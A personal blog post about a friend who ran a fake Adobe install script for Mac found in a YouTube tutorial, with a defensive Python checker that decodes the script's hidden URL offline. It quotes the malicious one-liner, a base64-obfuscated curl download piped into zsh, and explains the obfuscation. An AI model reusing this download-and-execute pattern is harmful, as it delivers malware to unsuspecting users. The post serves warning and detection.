On the way home from the office that day, my friend messaged me: "I think I accidentally ran a bad script."
My friend isn't a tech person, so script syntax, terminal commands, all of that is pretty foreign to them. I knew this was probably a no-brainer-run-everything situation. I did a quick interview to figure out how it even happened.
Turns out it was my friend's first time on a Mac and she wanted to install Adobe (the free version, please don't do this 🙃). She found a YouTube tutorial that walked her through it: run a script, and boom, Adobe installed.
I asked for the channel. Everything about it screamed sus 🙃. The video was 30 seconds long and uploaded only 5 days ago. And then I asked for the script.
echo "GitLink: https://gitsabode.com/the-rest-of-the-url.dmg" &&
curl -s $(echo 'someString' | openssl base64 -d -A) | zsh

The script prints a fake download progress as if it's pulling something from Adobe's website (which it clearly isn't), while in reality it's curling a malicious URL in the background: the real URL is stored as a base64 string, decoded on the fly by openssl, fetched with curl, and whatever comes back is piped straight into zsh.
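As an added example (my own illustration, not the script from the video or anything from that channel), here is a small Python checker that does the "quick double check" offline: it finds the base64 literal the one-liner decodes at run time, decodes it itself, and reports where the script would really connect, without executing or fetching anything. The sample script, the domains and the hash in it are constructed placeholders, not the real values from the post.

```python
import base64
import binascii
import re

# Matches the obfuscation used in the post: a base64 literal decoded at run time with
# `openssl base64 -d -A` (or `base64 -d`), so the real URL never appears in the script.
B64_DECODE = re.compile(
    r"(?:echo|printf)\s+['\"]?([A-Za-z0-9+/=]{8,})['\"]?\s*\|\s*"
    r"(?:openssl\s+base64\s+-d(?:\s+-A)?|base64\s+(?:-d|--decode|-D))"
)
# Output of something piped straight into an interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:zsh|bash|sh|ksh|dash)\b")
REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"<>)]+")


def decode_b64_literals(script):
    """Return the plaintext of every base64 literal the script decodes at run time.

    Nothing is executed and nothing is fetched; this is a purely offline read.
    """
    found = []
    for match in B64_DECODE.finditer(script):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, skip rather than guess
        found.append(raw.decode("utf-8", errors="replace"))
    return found


def analyze_script(script):
    """Summarise what a one-liner would actually do, without running it."""
    decoded = decode_b64_literals(script)
    visible_urls = URL.findall(script)
    hidden_urls = [u for text in decoded for u in URL.findall(text)]
    pipes_to_shell = PIPE_TO_SHELL.search(script) is not None
    fetches_remote = REMOTE_FETCH.search(script) is not None
    return {
        "pipes_to_shell": pipes_to_shell,
        "fetches_remote": fetches_remote,
        "decoded_strings": decoded,
        "visible_urls": visible_urls,   # what the script shows the user
        "hidden_urls": hidden_urls,     # what it would actually contact
        # The post's pattern: download-and-execute with the real target hidden.
        "suspicious": pipes_to_shell and fetches_remote and bool(hidden_urls),
    }


# Constructed sample in the shape of the script from the post. The domains and the
# hash are placeholders; the real script had the base64 literal hard-coded.
HIDDEN_TARGET = "https://example.invalid/curl/PLACEHOLDER-HASH"
SAMPLE_SCRIPT = (
    'echo "GitLink: https://example.invalid/installer.dmg" && '
    "curl -s $(echo '"
    + base64.b64encode(HIDDEN_TARGET.encode()).decode()
    + "' | openssl base64 -d -A) | zsh"
)

if __name__ == "__main__":
    report = analyze_script(SAMPLE_SCRIPT)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The useful signal is the mismatch between visible_urls (the decoy the echo shows) and hidden_urls (the decoded target), combined with curl output going straight into a shell. Running the checker before running the script is the whole point; the checker never contacts the decoded URL.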
My friend said the script ran for about 10 minutes and nothing seemed to happen. There were a few permission prompts for things she didn't really think about, but when it asked for Finder on the second or third prompt, that's when she got suspicious and finally killed the process (thank God, she stopped!). I was curious about what actually would've happened if she had let it finish. So I decoded the URL string and tried opening it in a browser, but it was down. Then I "cleaned" my laptop, set up Tor, and accessed it (curl -I) with different user agents. Apparently, the server was returning 520 only to browsers and most tools, while only responding "properly" to curl. But by the time I tried, even curl was getting 404. The decoded URL looked like something.com/curl/[long-hash]. My guess is the hash was a one-time identifier, so once her machine fetched it, the hash got marked as delivered and anyone hitting that same URL afterward gets a 404.
All I can say is, stay curious, stay paranoid. Install software from the actual vendor. And maybe… with AI everywhere today, a quick double check could save you a lot of trouble^^.
As for my friend, I told her to disconnect from the internet immediately and change all her passwords. Hopefully everything's fine.